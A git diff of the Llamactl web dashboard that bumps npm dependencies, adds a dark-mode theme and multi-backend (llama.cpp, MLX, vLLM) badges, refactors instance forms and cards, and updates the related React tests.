"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@emnapi/wasi-threads": {
"version": "1.0.2",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@napi-rs/wasm-runtime": {
"version": "0.2.11",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"@emnapi/core": "^1.4.3",
"@emnapi/runtime": "^1.4.3",
"@tybys/wasm-util": "^0.9.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/@tybys/wasm-util": {
"version": "0.9.0",
"inBundle": true,
"license": "MIT",
"optional": true,
"dependencies": {
"tslib": "^2.4.0"
}
},
"node_modules/@tailwindcss/oxide-wasm32-wasi/node_modules/tslib": {
"version": "2.8.0",
"inBundle": true,
"license": "0BSD",
"optional": true
},
"node_modules/@tailwindcss/oxide-win32-arm64-msvc": {
"version": "4.1.11",
"resolved": "https://registry.npmjs.org/@tailwindcss/oxide-win32-arm64-msvc/-/oxide-win32-arm64-msvc-4.1.11.tgz",
@@ -4190,10 +4245,13 @@
}
},
"node_modules/fdir": {
"version": "6.4.6",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.4.6.tgz",
"integrity": "sha512-hiFoqpyZcfNm1yc4u8oWCf9A2c4D3QjCrks3zmoVKVxpQRzmPNar1hUJcBG2RQHvEVGDN+Jm81ZheVLAQMK6+w==",
"version": "6.5.0",
"resolved": "https://registry.npmjs.org/fdir/-/fdir-6.5.0.tgz",
"integrity": "sha512-tIbYtZbucOs0BRGqPJkshJUYdL+SDH7dVM8gjy+ERp3WAUjLEFJE+02kanyHtwjWOnwrKYBiwAmM0p4kLJAnXg==",
"license": "MIT",
"engines": {
"node": ">=12.0.0"
},
"peerDependencies": {
"picomatch": "^3 || ^4"
},
@@ -6693,6 +6751,16 @@
"node": ">=18"
}
},
"node_modules/sonner": {
"version": "2.0.7",
"resolved": "https://registry.npmjs.org/sonner/-/sonner-2.0.7.tgz",
"integrity": "sha512-W6ZN4p58k8aDKA4XPcx2hpIQXBRAgyiWVkYhT7CvK6D3iAu7xjvVyhQHg2/iaKJZ1XVJ4r7XuwGL+WGEK37i9w==",
"license": "MIT",
"peerDependencies": {
"react": "^18.0.0 || ^19.0.0 || ^19.0.0-rc",
"react-dom": "^18.0.0 || ^19.0.0 || ^19.0.0-rc"
}
},
"node_modules/source-map-js": {
"version": "1.2.1",
"resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz",
@@ -6973,13 +7041,13 @@
"license": "MIT"
},
"node_modules/tinyglobby": {
"version": "0.2.14",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.14.tgz",
"integrity": "sha512-tX5e7OM1HnYr2+a2C/4V0htOcSQcoSTH9KgJnVvNm5zm/cyEWKJ7j7YutsH9CxMdtOkkLFy2AHrMci9IM8IPZQ==",
"version": "0.2.15",
"resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.15.tgz",
"integrity": "sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ==",
"license": "MIT",
"dependencies": {
"fdir": "^6.4.4",
"picomatch": "^4.0.2"
"fdir": "^6.5.0",
"picomatch": "^4.0.3"
},
"engines": {
"node": ">=12.0.0"
@@ -7356,17 +7424,17 @@
}
},
"node_modules/vite": {
"version": "7.0.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.0.5.tgz",
"integrity": "sha512-1mncVwJxy2C9ThLwz0+2GKZyEXuC3MyWtAAlNftlZZXZDP3AJt5FmwcMit/IGGaNZ8ZOB2BNO/HFUB+CpN0NQw==",
"version": "7.1.5",
"resolved": "https://registry.npmjs.org/vite/-/vite-7.1.5.tgz",
"integrity": "sha512-4cKBO9wR75r0BeIWWWId9XK9Lj6La5X846Zw9dFfzMRw38IlTk2iCcUt6hsyiDRcPidc55ZParFYDXi0nXOeLQ==",
"license": "MIT",
"dependencies": {
"esbuild": "^0.25.0",
"fdir": "^6.4.6",
"picomatch": "^4.0.2",
"fdir": "^6.5.0",
"picomatch": "^4.0.3",
"postcss": "^8.5.6",
"rollup": "^4.40.0",
"tinyglobby": "^0.2.14"
"rollup": "^4.43.0",
"tinyglobby": "^0.2.15"
},
"bin": {
"vite": "bin/vite.js"

View File

@@ -28,6 +28,7 @@
"lucide-react": "^0.525.0",
"react": "^19.1.0",
"react-dom": "^19.1.0",
"sonner": "^2.0.7",
"tailwind-merge": "^3.3.1",
"tailwindcss": "^4.1.11",
"zod": "^4.0.5"
@@ -51,7 +52,7 @@
"tw-animate-css": "^1.3.5",
"typescript": "^5.8.3",
"typescript-eslint": "^8.38.0",
"vite": "^7.0.5",
"vite": "^7.1.5",
"vitest": "^3.2.4"
}
}

View File

@@ -7,6 +7,8 @@ import SystemInfoDialog from "./components/SystemInfoDialog";
import { type CreateInstanceOptions, type Instance } from "@/types/instance";
import { useInstances } from "@/contexts/InstancesContext";
import { useAuth } from "@/contexts/AuthContext";
import { ThemeProvider } from "@/contexts/ThemeContext";
import { Toaster } from "sonner";
function App() {
const { isAuthenticated, isLoading: authLoading } = useAuth();
@@ -29,9 +31,9 @@ function App() {
const handleSaveInstance = (name: string, options: CreateInstanceOptions) => {
if (editingInstance) {
updateInstance(editingInstance.name, options);
void updateInstance(editingInstance.name, options);
} else {
createInstance(name, options);
void createInstance(name, options);
}
};
@@ -42,44 +44,52 @@ function App() {
// Show loading spinner while checking auth
if (authLoading) {
return (
<div className="min-h-screen bg-gray-50 flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading...</p>
<ThemeProvider>
<div className="min-h-screen bg-background flex items-center justify-center">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading...</p>
</div>
</div>
</div>
</ThemeProvider>
);
}
// Show login dialog if not authenticated
if (!isAuthenticated) {
return (
<div className="min-h-screen bg-gray-50">
<LoginDialog open={true} />
</div>
<ThemeProvider>
<div className="min-h-screen bg-background">
<LoginDialog open={true} />
</div>
</ThemeProvider>
);
}
// Show main app if authenticated
return (
<div className="min-h-screen bg-gray-50">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<ThemeProvider>
<div className="min-h-screen bg-background">
<Header onCreateInstance={handleCreateInstance} onShowSystemInfo={handleShowSystemInfo} />
<main className="container mx-auto max-w-4xl px-4 py-8">
<InstanceList editInstance={handleEditInstance} />
</main>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<InstanceDialog
open={isInstanceModalOpen}
onOpenChange={setIsInstanceModalOpen}
onSave={handleSaveInstance}
instance={editingInstance}
/>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
</div>
<SystemInfoDialog
open={isSystemInfoModalOpen}
onOpenChange={setIsSystemInfoModalOpen}
/>
<Toaster />
</div>
</ThemeProvider>
);
}

View File

@@ -5,6 +5,7 @@ import App from '@/App'
import { InstancesProvider } from '@/contexts/InstancesContext'
import { instancesApi } from '@/lib/api'
import type { Instance } from '@/types/instance'
import { BackendType } from '@/types/instance'
import { AuthProvider } from '@/contexts/AuthContext'
// Mock the API
@@ -46,8 +47,8 @@ function renderApp() {
describe('App Component - Critical Business Logic Only', () => {
const mockInstances: Instance[] = [
{ name: 'test-instance-1', running: false, options: { model: 'model1.gguf' } },
{ name: 'test-instance-2', running: true, options: { model: 'model2.gguf' } }
{ name: 'test-instance-1', status: 'stopped', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model1.gguf' } } },
{ name: 'test-instance-2', status: 'running', options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'model2.gguf' } } }
]
beforeEach(() => {
@@ -55,6 +56,21 @@ describe('App Component - Critical Business Logic Only', () => {
vi.mocked(instancesApi.list).mockResolvedValue(mockInstances)
window.sessionStorage.setItem('llamactl_management_key', 'test-api-key-123')
global.fetch = vi.fn(() => Promise.resolve(new Response(null, { status: 200 })))
// Mock window.matchMedia for dark mode functionality
Object.defineProperty(window, 'matchMedia', {
writable: true,
value: vi.fn().mockImplementation((query: string) => ({
matches: false,
media: query,
onchange: null,
addListener: vi.fn(),
removeListener: vi.fn(),
addEventListener: vi.fn(),
removeEventListener: vi.fn(),
dispatchEvent: vi.fn(),
})),
})
})
afterEach(() => {
@@ -66,8 +82,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const newInstance: Instance = {
name: 'new-test-instance',
running: false,
options: { model: 'new-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'new-model.gguf' } }
}
vi.mocked(instancesApi.create).mockResolvedValue(newInstance)
@@ -90,6 +106,7 @@ describe('App Component - Critical Business Logic Only', () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith('new-test-instance', {
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP
})
})
@@ -103,8 +120,8 @@ describe('App Component - Critical Business Logic Only', () => {
const user = userEvent.setup()
const updatedInstance: Instance = {
name: 'test-instance-1',
running: false,
options: { model: 'updated-model.gguf' }
status: 'stopped',
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: 'updated-model.gguf' } }
}
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance)
@@ -123,7 +140,8 @@ describe('App Component - Critical Business Logic Only', () => {
// Verify correct API call with existing instance data
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith('test-instance-1', {
model: "model1.gguf", // Pre-filled from existing instance
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "model1.gguf" } // Pre-filled from existing instance
})
})
})
@@ -142,7 +160,7 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getAllByTitle('Start instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Stop instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('Edit instance').length).toBe(2)
expect(screen.getAllByTitle('Delete instance').length).toBeGreaterThan(0)
expect(screen.getAllByTitle('More actions').length).toBe(2)
})
it('delete confirmation calls correct API', async () => {
@@ -156,8 +174,17 @@ describe('App Component - Critical Business Logic Only', () => {
expect(screen.getByText('test-instance-1')).toBeInTheDocument()
})
const deleteButtons = screen.getAllByTitle('Delete instance')
await user.click(deleteButtons[0])
// First click the "More actions" button to reveal the delete button
const moreActionsButtons = screen.getAllByTitle('More actions')
await user.click(moreActionsButtons[0])
// Wait for the delete button to appear and click it
await waitFor(() => {
expect(screen.getByTitle('Delete instance')).toBeInTheDocument()
})
const deleteButton = screen.getByTitle('Delete instance')
await user.click(deleteButton)
// Verify confirmation and API call
expect(confirmSpy).toHaveBeenCalledWith('Are you sure you want to delete instance "test-instance-1"?')

View File

@@ -0,0 +1,65 @@
import React from "react";
import { Badge } from "@/components/ui/badge";
import { BackendType, type BackendTypeValue } from "@/types/instance";
import { Server, Package } from "lucide-react";
interface BackendBadgeProps {
backend?: BackendTypeValue;
docker?: boolean;
}
const BackendBadge: React.FC<BackendBadgeProps> = ({ backend, docker }) => {
if (!backend) {
return null;
}
const getText = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "llama.cpp";
case BackendType.MLX_LM:
return "MLX";
case BackendType.VLLM:
return "vLLM";
default:
return backend;
}
};
const getColorClasses = () => {
switch (backend) {
case BackendType.LLAMA_CPP:
return "bg-blue-100 text-blue-800 border-blue-200 dark:bg-blue-900 dark:text-blue-200 dark:border-blue-800";
case BackendType.MLX_LM:
return "bg-green-100 text-green-800 border-green-200 dark:bg-green-900 dark:text-green-200 dark:border-green-800";
case BackendType.VLLM:
return "bg-purple-100 text-purple-800 border-purple-200 dark:bg-purple-900 dark:text-purple-200 dark:border-purple-800";
default:
return "bg-gray-100 text-gray-800 border-gray-200 dark:bg-gray-900 dark:text-gray-200 dark:border-gray-800";
}
};
return (
<div className="flex items-center gap-1">
<Badge
variant="outline"
className={`flex items-center gap-1.5 ${getColorClasses()}`}
>
<Server className="h-3 w-3" />
<span className="text-xs">{getText()}</span>
</Badge>
{docker && (
<Badge
variant="outline"
className="flex items-center gap-1.5 bg-orange-100 text-orange-800 border-orange-200 dark:bg-orange-900 dark:text-orange-200 dark:border-orange-800"
title="Docker enabled"
>
<Package className="h-3 w-3" />
<span className="text-[10px] uppercase tracking-wide">Docker</span>
</Badge>
)}
</div>
);
};
export default BackendBadge;

View File

@@ -2,24 +2,23 @@ import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
import { Checkbox } from '@/components/ui/checkbox'
import type { CreateInstanceOptions } from '@/types/instance'
import { getFieldType, basicFieldsConfig } from '@/lib/zodFormUtils'
import { getBackendFieldType, basicBackendFieldsConfig } from '@/lib/zodFormUtils'
interface ZodFormFieldProps {
fieldKey: keyof CreateInstanceOptions
value: any
onChange: (key: keyof CreateInstanceOptions, value: any) => void
interface BackendFormFieldProps {
fieldKey: string
value: string | number | boolean | string[] | undefined
onChange: (key: string, value: string | number | boolean | string[] | undefined) => void
}
const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }) => {
const BackendFormField: React.FC<BackendFormFieldProps> = ({ fieldKey, value, onChange }) => {
// Get configuration for basic fields, or use field name for advanced fields
const config = basicFieldsConfig[fieldKey as string] || { label: fieldKey }
const config = basicBackendFieldsConfig[fieldKey as string] || { label: fieldKey }
// Get type from Zod schema
const fieldType = getFieldType(fieldKey)
const fieldType = getBackendFieldType(fieldKey)
const handleChange = (newValue: any) => {
onChange(fieldKey, newValue)
const handleChange = (newValue: string | number | boolean | string[] | undefined) => {
onChange(fieldKey as string, newValue)
}
const renderField = () => {
@@ -29,7 +28,7 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="flex items-center space-x-2">
<Checkbox
id={fieldKey}
checked={value || false}
checked={typeof value === 'boolean' ? value : false}
onCheckedChange={(checked) => handleChange(checked)}
/>
<Label htmlFor={fieldKey} className="text-sm font-normal">
@@ -46,15 +45,18 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="number"
value={value || ''}
step="any" // This allows decimal numbers
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => {
const numValue = e.target.value ? parseFloat(e.target.value) : undefined
handleChange(numValue)
// Only update if the parsed value is valid or the input is empty
if (e.target.value === '' || (numValue !== undefined && !isNaN(numValue))) {
handleChange(numValue)
}
}}
placeholder={config.placeholder}
/>
@@ -69,7 +71,6 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
@@ -96,12 +97,11 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
<div className="grid gap-2">
<Label htmlFor={fieldKey}>
{config.label}
{config.required && <span className="text-red-500 ml-1">*</span>}
</Label>
<Input
id={fieldKey}
type="text"
value={value || ''}
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => handleChange(e.target.value || undefined)}
placeholder={config.placeholder}
/>
@@ -116,4 +116,4 @@ const ZodFormField: React.FC<ZodFormFieldProps> = ({ fieldKey, value, onChange }
return <div className="space-y-2">{renderField()}</div>
}
export default ZodFormField
export default BackendFormField

View File

@@ -1,6 +1,7 @@
import { Button } from "@/components/ui/button";
import { HelpCircle, LogOut } from "lucide-react";
import { HelpCircle, LogOut, Moon, Sun } from "lucide-react";
import { useAuth } from "@/contexts/AuthContext";
import { useTheme } from "@/contexts/ThemeContext";
interface HeaderProps {
onCreateInstance: () => void;
@@ -9,6 +10,7 @@ interface HeaderProps {
function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
const { logout } = useAuth();
const { theme, toggleTheme } = useTheme();
const handleLogout = () => {
if (confirm("Are you sure you want to logout?")) {
@@ -17,10 +19,10 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
};
return (
<header className="bg-white border-b border-gray-200">
<header className="bg-card border-b border-border">
<div className="container mx-auto max-w-4xl px-4 py-4">
<div className="flex items-center justify-between">
<h1 className="text-2xl font-bold text-gray-900">
<h1 className="text-2xl font-bold text-foreground">
Llamactl Dashboard
</h1>
@@ -29,6 +31,16 @@ function Header({ onCreateInstance, onShowSystemInfo }: HeaderProps) {
Create Instance
</Button>
<Button
variant="outline"
size="icon"
onClick={toggleTheme}
data-testid="theme-toggle-button"
title={`Switch to ${theme === 'light' ? 'dark' : 'light'} mode`}
>
{theme === 'light' ? <Moon className="h-4 w-4" /> : <Sun className="h-4 w-4" />}
</Button>
<Button
variant="outline"
size="icon"

View File

@@ -27,6 +27,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return <XCircle className="h-3 w-3" />;
case "unknown":
return <Loader2 className="h-3 w-3 animate-spin" />;
case "failed":
return <XCircle className="h-3 w-3" />;
}
};
@@ -40,6 +42,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "destructive";
case "unknown":
return "secondary";
case "failed":
return "destructive";
}
};
@@ -53,6 +57,8 @@ const HealthBadge: React.FC<HealthBadgeProps> = ({ health }) => {
return "Error";
case "unknown":
return "Unknown";
case "failed":
return "Failed";
}
};

View File

@@ -2,9 +2,10 @@
import { Button } from "@/components/ui/button";
import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card";
import type { Instance } from "@/types/instance";
import { Edit, FileText, Play, Square, Trash2 } from "lucide-react";
import { Edit, FileText, Play, Square, Trash2, MoreHorizontal } from "lucide-react";
import LogsDialog from "@/components/LogDialog";
import HealthBadge from "@/components/HealthBadge";
import BackendBadge from "@/components/BackendBadge";
import { useState } from "react";
import { useInstanceHealth } from "@/hooks/useInstanceHealth";
@@ -24,7 +25,8 @@ function InstanceCard({
editInstance,
}: InstanceCardProps) {
const [isLogsOpen, setIsLogsOpen] = useState(false);
const health = useInstanceHealth(instance.name, instance.running);
const [showAllActions, setShowAllActions] = useState(false);
const health = useInstanceHealth(instance.name, instance.status);
const handleStart = () => {
startInstance(instance.name);
@@ -50,38 +52,48 @@ function InstanceCard({
setIsLogsOpen(true);
};
const running = instance.status === "running";
return (
<>
<Card>
<CardHeader className="pb-3">
<div className="flex items-center justify-between">
<CardTitle className="text-lg">{instance.name}</CardTitle>
{instance.running && <HealthBadge health={health} />}
<Card className="hover:shadow-md transition-shadow">
<CardHeader className="pb-4">
{/* Header with instance name and status badges */}
<div className="space-y-3">
<CardTitle className="text-lg font-semibold leading-tight break-words">
{instance.name}
</CardTitle>
{/* Badges row */}
<div className="flex items-center gap-2 flex-wrap">
<BackendBadge backend={instance.options?.backend_type} docker={instance.docker_enabled} />
{running && <HealthBadge health={health} />}
</div>
</div>
</CardHeader>
<CardContent>
<div className="flex gap-1">
<CardContent className="pt-0">
{/* Primary actions - always visible */}
<div className="flex items-center gap-2 mb-3">
<Button
size="sm"
variant="outline"
onClick={handleStart}
disabled={instance.running}
title="Start instance"
data-testid="start-instance-button"
variant={running ? "outline" : "default"}
onClick={running ? handleStop : handleStart}
className="flex-1"
title={running ? "Stop instance" : "Start instance"}
data-testid={running ? "stop-instance-button" : "start-instance-button"}
>
<Play className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="outline"
onClick={handleStop}
disabled={!instance.running}
title="Stop instance"
data-testid="stop-instance-button"
>
<Square className="h-4 w-4" />
{running ? (
<>
<Square className="h-4 w-4 mr-1" />
Stop
</>
) : (
<>
<Play className="h-4 w-4 mr-1" />
Start
</>
)}
</Button>
<Button
@@ -97,24 +109,40 @@ function InstanceCard({
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
onClick={() => setShowAllActions(!showAllActions)}
title="More actions"
>
<FileText className="h-4 w-4" />
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={instance.running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
<MoreHorizontal className="h-4 w-4" />
</Button>
</div>
{/* Secondary actions - collapsible */}
{showAllActions && (
<div className="flex items-center gap-2 pt-2 border-t border-border">
<Button
size="sm"
variant="outline"
onClick={handleLogs}
title="View logs"
data-testid="view-logs-button"
className="flex-1"
>
<FileText className="h-4 w-4 mr-1" />
Logs
</Button>
<Button
size="sm"
variant="destructive"
onClick={handleDelete}
disabled={running}
title="Delete instance"
data-testid="delete-instance-button"
>
<Trash2 className="h-4 w-4" />
</Button>
</div>
)}
</CardContent>
</Card>
@@ -122,7 +150,7 @@ function InstanceCard({
open={isLogsOpen}
onOpenChange={setIsLogsOpen}
instanceName={instance.name}
isRunning={instance.running}
isRunning={running}
/>
</>
);

View File

@@ -1,7 +1,5 @@
import React, { useState, useEffect } from "react";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
Dialog,
DialogContent,
@@ -10,10 +8,10 @@ import {
DialogHeader,
DialogTitle,
} from "@/components/ui/dialog";
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { getBasicFields, getAdvancedFields } from "@/lib/zodFormUtils";
import { ChevronDown, ChevronRight } from "lucide-react";
import ZodFormField from "@/components/ZodFormField";
import { BackendType, type CreateInstanceOptions, type Instance } from "@/types/instance";
import ParseCommandDialog from "@/components/ParseCommandDialog";
import InstanceSettingsCard from "@/components/instance/InstanceSettingsCard";
import BackendConfigurationCard from "@/components/instance/BackendConfigurationCard";
interface InstanceDialogProps {
open: boolean;
@@ -29,16 +27,12 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
instance,
}) => {
const isEditing = !!instance;
const isRunning = instance?.running || true; // Assume running if instance exists
const [instanceName, setInstanceName] = useState("");
const [formData, setFormData] = useState<CreateInstanceOptions>({});
const [showAdvanced, setShowAdvanced] = useState(false);
const [nameError, setNameError] = useState("");
const [showParseDialog, setShowParseDialog] = useState(false);
// Get field lists dynamically from the type
const basicFields = getBasicFields();
const advancedFields = getAdvancedFields();
// Reset form when dialog opens/closes or when instance changes
useEffect(() => {
@@ -52,17 +46,39 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
setInstanceName("");
setFormData({
auto_restart: true, // Default value
backend_type: BackendType.LLAMA_CPP, // Default backend type
backend_options: {},
});
}
setShowAdvanced(false); // Always start with basic view
setNameError(""); // Reset any name errors
}
}, [open, instance]);
const handleFieldChange = (key: keyof CreateInstanceOptions, value: any) => {
setFormData((prev) => {
// If backend_type is changing, clear backend_options
if (key === 'backend_type' && prev.backend_type !== value) {
return {
...prev,
[key]: value,
backend_options: {}, // Clear backend options when backend type changes
};
}
return {
...prev,
[key]: value,
};
});
};
const handleBackendFieldChange = (key: string, value: any) => {
setFormData((prev) => ({
...prev,
[key]: value,
backend_options: {
...prev.backend_options,
[key]: value,
} as any,
}));
};
@@ -90,7 +106,24 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
// Clean up undefined values to avoid sending empty fields
const cleanOptions: CreateInstanceOptions = {};
Object.entries(formData).forEach(([key, value]) => {
if (value !== undefined && value !== "" && value !== null) {
if (key === 'backend_options' && value && typeof value === 'object') {
// Handle backend_options specially - clean nested object
const cleanBackendOptions: any = {};
Object.entries(value).forEach(([backendKey, backendValue]) => {
if (backendValue !== undefined && backendValue !== null && (typeof backendValue !== 'string' || backendValue.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(backendValue) && backendValue.length === 0) {
return;
}
cleanBackendOptions[backendKey] = backendValue;
}
});
// Only include backend_options if it has content
if (Object.keys(cleanBackendOptions).length > 0) {
(cleanOptions as any)[key] = cleanBackendOptions;
}
} else if (value !== undefined && value !== null && (typeof value !== 'string' || value.trim() !== "")) {
// Handle arrays - don't include empty arrays
if (Array.isArray(value) && value.length === 0) {
return;
@@ -107,12 +140,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
onOpenChange(false);
};
const toggleAdvanced = () => {
setShowAdvanced(!showAdvanced);
const handleCommandParsed = (parsedOptions: CreateInstanceOptions) => {
setFormData(prev => ({
...prev,
...parsedOptions,
}));
setShowParseDialog(false);
};
// Check if auto_restart is enabled
const isAutoRestartEnabled = formData.auto_restart === true;
// Save button label logic
let saveButtonLabel = "Create Instance";
if (isEditing) {
if (instance?.status === "running") {
saveButtonLabel = "Update & Restart Instance";
} else {
saveButtonLabel = "Update Instance";
}
}
return (
<Dialog open={open} onOpenChange={onOpenChange}>
@@ -129,125 +175,25 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
</DialogHeader>
<div className="flex-1 overflow-y-auto">
<div className="grid gap-6 py-4">
{/* Instance Name - Special handling since it's not in CreateInstanceOptions */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
<Input
id="name"
value={instanceName}
onChange={(e) => handleNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing} // Don't allow name changes when editing
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
<div className="space-y-6 py-4">
{/* Instance Settings Card */}
<InstanceSettingsCard
instanceName={instanceName}
nameError={nameError}
isEditing={isEditing}
formData={formData}
onNameChange={handleNameChange}
onChange={handleFieldChange}
/>
{/* Auto Restart Configuration Section */}
<div className="space-y-4">
<h3 className="text-lg font-medium">
Auto Restart Configuration
</h3>
{/* Backend Configuration Card */}
<BackendConfigurationCard
formData={formData}
onBackendFieldChange={handleBackendFieldChange}
onChange={handleFieldChange}
onParseCommand={() => setShowParseDialog(true)}
/>
{/* Auto Restart Toggle */}
<ZodFormField
fieldKey="auto_restart"
value={formData.auto_restart}
onChange={handleFieldChange}
/>
{/* Show restart options only when auto restart is enabled */}
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<ZodFormField
fieldKey="max_restarts"
value={formData.max_restarts}
onChange={handleFieldChange}
/>
<ZodFormField
fieldKey="restart_delay"
value={formData.restart_delay}
onChange={handleFieldChange}
/>
</div>
)}
</div>
{/* Basic Fields - Automatically generated from type (excluding auto restart options) */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Configuration</h3>
{basicFields
.filter(
(fieldKey) =>
fieldKey !== "auto_restart" &&
fieldKey !== "max_restarts" &&
fieldKey !== "restart_delay"
) // Exclude auto_restart, max_restarts, and restart_delay as they're handled above
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
{/* Advanced Fields Toggle */}
<div className="border-t pt-4">
<Button
variant="ghost"
onClick={toggleAdvanced}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Configuration
<span className="text-muted-foreground text-sm font-normal">
(
{
advancedFields.filter(
(f) =>
!["max_restarts", "restart_delay"].includes(f as string)
).length
}{" "}
options)
</span>
</Button>
</div>
{/* Advanced Fields - Automatically generated from type (excluding restart options) */}
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<div className="space-y-4">
{advancedFields
.filter(
(fieldKey) =>
!["max_restarts", "restart_delay"].includes(
fieldKey as string
)
) // Exclude restart options as they're handled above
.sort()
.map((fieldKey) => (
<ZodFormField
key={fieldKey}
fieldKey={fieldKey}
value={formData[fieldKey]}
onChange={handleFieldChange}
/>
))}
</div>
</div>
)}
</div>
</div>
@@ -264,14 +210,17 @@ const InstanceDialog: React.FC<InstanceDialogProps> = ({
disabled={!instanceName.trim() || !!nameError}
data-testid="dialog-save-button"
>
{isEditing
? isRunning
? "Update & Restart Instance"
: "Update Instance"
: "Create Instance"}
{saveButtonLabel}
</Button>
</DialogFooter>
</DialogContent>
<ParseCommandDialog
open={showParseDialog}
onOpenChange={setShowParseDialog}
onParsed={handleCommandParsed}
backendType={formData.backend_type || BackendType.LLAMA_CPP}
/>
</Dialog>
);
};

View File

@@ -18,8 +18,8 @@ function InstanceList({ editInstance }: InstanceListProps) {
return (
<div className="flex items-center justify-center py-12" aria-label="Loading">
<div className="text-center">
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-600 mx-auto mb-4"></div>
<p className="text-gray-600">Loading instances...</p>
<div className="animate-spin rounded-full h-8 w-8 border-b-2 border-primary mx-auto mb-4"></div>
<p className="text-muted-foreground">Loading instances...</p>
</div>
</div>
)
@@ -28,7 +28,7 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (error) {
return (
<div className="text-center py-12">
<div className="text-red-600 mb-4">
<div className="text-destructive mb-4">
<p className="text-lg font-semibold">Error loading instances</p>
<p className="text-sm">{error}</p>
</div>
@@ -39,15 +39,15 @@ function InstanceList({ editInstance }: InstanceListProps) {
if (instances.length === 0) {
return (
<div className="text-center py-12">
<p className="text-gray-600 text-lg mb-2">No instances found</p>
<p className="text-gray-500 text-sm">Create your first instance to get started</p>
